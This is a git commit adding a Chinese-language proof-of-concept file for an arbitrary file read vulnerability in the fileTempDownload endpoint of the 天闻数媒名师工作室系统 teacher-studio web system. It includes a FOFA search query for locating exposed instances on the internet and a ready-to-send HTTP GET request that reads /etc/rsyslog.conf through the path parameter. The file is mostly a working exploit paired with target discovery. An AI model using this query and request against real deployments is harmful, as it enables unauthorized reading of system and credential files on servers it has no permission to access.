Create 天闻数媒名师工作室系统fileTempDownload任意文件读取.md

2025-05-05 10:17:57 +00:00 · 2025-04-21 09:11:04 +08:00 · 2025-04-21 09:11:04 +08:00 · 6db42c1bef
commit 6db42c1bef
parent 0e4b03cb1c
1 changed files with 16 additions and 0 deletions
--- a/wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md
+++ b/wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md
@ -0,0 +1,16 @@
+# 天闻数媒名师工作室系统fileTempDownload任意文件读取
+
+# 一、漏洞简介
+天闻数媒名师工作室系统fileTempDownload接口存在任意文件读取漏洞
+
+# 二、影响版本
+ 天闻数媒名师工作室系统
+
+# 三、资产测绘
+ fofa`body="/static/js/bootstrap/bootstrap.css" && title="名师工作室"`
+
+# 四、漏洞复现
+```plain
+GET /fileUploadAndDownload/fileTempDownload?path=/etc/rsyslog.conf HTTP/1.1
+Host: 127.0.0.1:8080
+```